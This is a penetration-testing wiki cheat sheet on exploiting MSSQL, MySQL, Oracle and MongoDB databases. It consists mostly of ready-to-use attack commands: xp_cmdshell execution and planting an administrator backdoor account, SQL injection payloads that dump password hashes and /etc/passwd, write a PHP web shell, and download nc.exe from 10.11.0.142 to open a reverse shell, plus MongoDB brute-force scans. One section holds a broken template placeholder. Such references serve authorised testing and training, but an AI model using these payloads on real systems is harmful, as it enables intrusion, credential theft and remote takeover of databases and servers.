SQL Exploitation

From pentestwiki.org

Exploitation MSSQL

$sqsh -S $IP -U sa -P $PASSWORD


$sqlcmd -S localhost -U SA -P $PASSWORD



MSSQL xp_cmdshell

Execute commands:

$nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP


Planting a backdoor account:

$nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user jack [email protected] /add" $IP
$nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net localgroup Administrators jack /add" $IP


Queries:

xp_cmdshell 'whoami.exe'
xp..cmdshell 'dir c:\'
exec xp_cmdshell 'whoami.exe'
exec master.dbo.xp_cmdshell 'osql -E -Sserver1 -i c:\temp\nightly.sql'
EXEC master..xp_cmdshell 'dir *.exe'' 
xp_cmdshell 'dir *.exe';  
DECLARE @cmd sysname, @var sysname;  
SET @var = 'Hello world';  
SET @cmd = 'echo ' + @var + ' > var_out.txt';  
EXEC master..xp_cmdshell @cmd; 

Queries

SELECT name FROM sysusers WHERE name = USER_NAME();
SELECT HOST_NAME(), USER_NAME(), SYSTEM_USER, @@VERSION, @@SERVERNAME, @@LANGUAGE
SELECT DB_NAME()
Execute spFileDetails 'c:\autoexec.bat'
Select dbo.ufsReadfileAsString ('MyPath','MyFileName')
EXEC xp_cmdshell 'dir *.exe'
SELECT xp_msver ProductVersion, xp_msver WindowsVersion
SELECT CURRENT_USER
SELECT WAIT_FOR(20)

List SQL users:

select * from master.sys.server_principals

HOW TO ENABLE XP_CMDSHELL

-- To allow advanced options to be changed.  
EXEC sp_configure 'show advanced options', 1;  
GO  
-- To update the currently configured value for advanced options.  
RECONFIGURE;  
GO  
-- To enable the feature.  
EXEC sp_configure 'xp_cmdshell', 1;  
GO  
-- To update the currently configured value for this feature.  
RECONFIGURE;  
GO  

SQL Exploitation (SQLi) MySQL (raw queries)

345 order by 7
en' order by 7 -- 
345 and sleep(5)
en/**/and/**/sleep(5)
en'/**/and/**/sleep(5)-- 
734 union all select 1,@@version,3,4,table_name,6 from information_schema.tables
734 union all select 1,@@version,3,4,column_name,6 from information_schema.columns where table_name="users"
734 union select 1,2,3,4,concat(Host, " / ", User," / ", Password),6 from mysql.user
734 union all select 1,2,3,4,5,load_file('/etc/passwd') 
734 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']); ?>",6 into outfile 'c:/xampp/htdocs/backdoor.php'
734 union all select 1,2,3,4,<?php $filename='C:/xampp/htdocs/nc.exe'; $download='http://10.11.0.142/nc.exe'; file_put_contents($filename,file_get_contents($download)); system('C:/xampp/htdocs/nc.exe -e cmd.exe 10.11.0.142 443'); ?>,6 into outfile  'c:/xampp/htdocs/backdoor3.php'
en' union select 1,2,3,4,"<?php $filename='nc.exe'; $download='http://10.11.0.142/nc.exe'; file_put_contents($filename,file_get_contents($download)); system('nc.exe -e cmd.exe 10.11.0.142 443'); ?>",6 into outfile 'c:/xampp/htdocs/backdoor-post.php' -- 
SHOW DATABASES = SHOW SCHEMAS = SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA

Exploitation Oracle

Testing connection:

$cat $ORACLE_HOME/network/admin/tnsnames.ora
$cat $TNSADMIN


if set up:

$tnsping net_service_name count


Connecting into the database:

Syntax:

$/usr/lib/oracle/12.2/client64/bin/sqlplus <USERNAME>/<PASSWORD>@<HOSTNAME>/<SERVICE_NAME>
$sqlplus sys/<your password>@//localhost:1521/<your SID> as sysdba
$sqlplus system/<your password>@//localhost:1521/<your SID>


For SSL connections:

$cat $ORACLE_HOME/network/admin/sqlnet.ora
$sqlplus -L [email protected]<SERVICE NAME>
$sqlplus -L $USER/[email protected]$SERVICE


Queries:

SELECT NAME, FILE#, STATUS, CHECKPOINT_CHANGE# "CHECKPOINT" FROM V$DATAFILE
SELECT sysdate FROM dual
SELECT * FROM PRODUCT_COMPONENT_VERSION; # Show versions
SELECT table_name FROM all_tables; # Show tables
SELECT owner, table_name FROM all_tables;
SELECT user FROM dual; # Show current user
SELECT * from <TABLE> FETCH FIRST 10 ROWS ONLY; # LIMIT 10
SELECT DISTINCT OWNER FROM ALL_OBJECTS; # Show users
SELECT TABLESPACE_NAME FROM USER_TABLESPACES; # List tablespaces

# Use the following SQL to find the entire list of objects you have access to
select * from all_tab_privs;

SELECT USERNAME,PASSWORD_VERSIONS FROM SYS.DBA_USERS;

Connection checker (when no sqlplus): https://github.com/aimtiaz11/oracle-jdbc-tester


TNS Poison vulnerability

{{Cmd}}
Parameter 1 not defined. For correct usage see template's documention.


References:

Tools:

Exploitation MongoDB

Ports 3000, 27017, 28017

$nmap --script=mongodb-brute $IP


$nmap --script=mongodb-databases $IP


$mongo --port <PORT> -u $USER -p $PASS $IP


$nosqlmap $IP